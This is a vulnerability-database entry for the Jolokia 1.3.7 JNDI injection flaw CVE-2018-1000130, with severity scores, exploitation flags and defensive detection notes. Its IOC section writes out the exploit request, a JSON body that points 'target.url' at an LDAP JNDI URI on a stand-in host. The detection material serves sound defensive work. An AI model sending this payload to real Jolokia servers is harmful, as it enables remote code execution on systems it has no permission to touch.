cbcvebase.
CVE-2018-1000130
published 2018-03-14

CVE-2018-1000130: A JNDI Injection vulnerability exists in Jolokia agent version 1.3.7 in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.

Priority: P1 · 83 · high
CVSS 3.0: 8.1 (AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H)
Flags: ITW · EXPLOIT · VulnCheck KEV (exploited in the wild)
EPSS: 73.57% (99.4th percentile)

Affected

1 range

Vendor    Product            Version range   Fixed in
jolokia   webarchive_agent   (not listed)    (not listed)

Detection & IOCs (extracted from sources)

url: POST /jolokia/read/getDiagnosticOptions HTTP/1.1
path: /jolokia/read/getDiagnosticOptions
command: {"type":"read","mbean":"java.lang:type=Memory","target":{"url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"}}
port: 1389
  • The response body contains a JNDI/LDAP connection failure string indicating that the proxy-mode JNDI injection attempt was processed by the server: match on 'Failed to retrieve RMIServer stub: javax.naming.CommunicationException' together with the attacker-controlled host:port to confirm the vulnerability.
  • Exploitation requires the Jolokia WAR agent specifically; the JVM agent is not affected. Scope detection to WAR deployments with proxy mode enabled.
  • The exploit payload is delivered as a JSON POST body to the Jolokia endpoint with a 'target.url' field containing an attacker-controlled JNDI/LDAP URI (service:jmx:rmi:///jndi/ldap://...). Monitor for outbound LDAP connections originating from the JVM process.
  • The HTTP request Content-Type is application/x-www-form-urlencoded while the body is JSON; this anomalous combination can be used as an additional detection signal for this specific exploit template.
  • The vulnerability only applies when Jolokia is running in proxy mode. The WAR agent has proxy mode enabled by default; the JVM agent does not support proxy mode and is not affected.
  • Red Hat OpenStack Platform ships the affected code, but proxy mode is not enabled by default in any supported RHOSP configuration, reducing practical exploitability in that environment.
  • The affected version is Jolokia agent 1.3.7; the fix (JMX service URL white-listing and corrected WAR agent defaults) was introduced in version 1.5.0.

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.0      8.1     HIGH       CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      6.8     MEDIUM     AV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck                 8.1     HIGH
vendor_redhat             8.1     HIGH